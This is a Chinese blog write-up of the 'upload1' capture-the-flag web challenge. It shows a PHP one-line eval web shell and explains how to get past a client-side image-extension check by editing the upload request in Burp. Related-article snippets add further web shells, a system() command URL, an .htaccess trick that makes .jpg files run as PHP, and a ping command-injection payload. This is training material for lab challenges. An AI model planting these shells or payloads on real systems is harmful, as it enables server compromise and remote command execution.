攻防世界upload1

最新推荐文章于 2024-04-29 21:13:05 发布
最新推荐文章于 2024-04-29 21:13:05 发布
阅读量1k 收藏
点赞数
分类专栏: ctf刷题纪 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/122755292
版权
upload1

在这里插入图片描述

进入环境就一个上传,我们先上传一个普通的木马文件看看

木马内容

<?php @eval($_POST["cmd"]); ?>

在这里插入图片描述

估计是前端校验我们查看源码

在这里插入图片描述

只能上传jpg和png图片,那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可

在这里插入图片描述

在这里插入图片描述

然后访问木马文件执行指令即可

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

执行后查看源码便发现flag

在这里插入图片描述

听门外雪花飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 upload1 解题详析
等风来
05-24 4498
该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 [‘jpg’,‘png’]这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。若文件上传成功,则在上传路径对应的页面会输出。考察文件上传,具体原理及姿势不再赘述。抓包,修改filename文件后缀为。无Error回显,说明木马上传成功。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
xctf攻防世界 upload1
m0_71282722的博客
05-08 207
此时将木马文件后缀改为jpg,一会再用bp改过来。查看flag.php 找到flag。第二种上传方式:使用bp绕过。第一种:前端绕过,删除约束。此时能上传php文件了。
攻防世界upload1、[ACTF2020 新生赛]Upload、[极客大挑战 2019]Upload、[MRCTF2020]你传你呢、[GXYCTF2019]BabyUpload
最新发布
cyy001128的博客
04-29 336
补充:只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所有以.jpg后缀的文件全都当作php文件来执行),上传成功后再上传jpg文件就可以了。接着上传jpg文件,可以发现上传成功,那是因为.htaccess文件自动将1.jpg文件当作php解析了。尝试先上传一个.htaccess文件,抓包更改content-type后,在重放器测试发现中有回显。上传jpg文件,抓包更改后缀,发现php后缀无法上传。先尝试上传一个php文件,发现有白名单。
攻防世界upload1(web)
yuanxu8877的博客
11-22 1058
攻防世界web-upload1
攻防世界upload1解题过程
小诺言的博客
02-22 5598
1:这是文件上传漏洞的简单题目,查看网页源代码发现这个 审计发现这是Java Script,对上传的文件格式进行了限制; 2:打开需要用到的工具,蚁* ,菜* 等等,坏了就再找一个,还有bp,我配合bp做的,没有的用这个<?php eval($_POST['a']); ?>,密码a. 3:上传一句话马后,抓到迫使特请求包,进行Repeater,将filename下的xxxxxx.jpg后缀改成php, rh就能成功连接了,右边Response的Upload success里面的..
攻防世界upload1
bjml_的博客
11-06 726
攻防世界upload1
攻防世界 upload1
m0_56107268的博客
05-07 194
进入先查看源代码 function check(){ upfile = document.getElementById("upfile"); submit = document.getElementById("submit"); name = upfile.value; ext = name.replace(/^.+\./,''); if(['jpg','png'].contains(ext)){ submit.disabled = false; }else{ submit.disable
file upload 攻防世界_攻防世界upload1
weixin_39760368的博客
12-21 111
打开一看是文件上传题1.先上个php一句话(提示上传图片) 一句话:2.发现有前端js验证3.推荐添加一个火狐的插件非常好用启用插件关闭js即可上传成功,并给出了路径4.然后添加路径访问,构造url使用system命令执行即可取得flaghttp://220.249.52.134:56156/upload/1608189359.a.php/?a=system('ls ../');在上级目录得到...
[wp] 攻防世界 upload1
MercyLin的博客
09-23 2339
右键查看源码发现 <script type="text/javascript"> Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] === obj) { return true;...
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项流量分析1
11-14
攻防世界杂项流量分析1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840807
一道简单的流量分析
weixin_52268949的博客
11-22 5630
流量附件提取 链接:https://pan.baidu.com/s/1oHSbIFiqs6ENmqykzFkEKg 提取码:do7s 1、 使用Wireshark查看并分析attack.pcapng数据包文件,通过分析数据包attack.pcapng找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交: 我们使用http.request.method == GET这个方法来过滤一下GET请求包 发现两个登录页面的请求包一个是172.16.1.10向172.16.1.101发出的请
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2353
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
[GXYCTF2019]Ping Ping Ping
weixin_52268949的博客
02-07 2308
[GXYCTF2019]Ping Ping Ping 进入环境输个ip发现就是在ping这个ip地址,我们尝试使用分号来执行命令 发现flag.php可惜不能直接cat flag.php估计绊掉了,那我们cat index.php看看还是不行,尝试绕过了一下空格,原来空格也过滤了,这样一来源码就出来了 ?ip=127.0.0.1;cat$IFS$9index.php 源码如下 /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo pr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值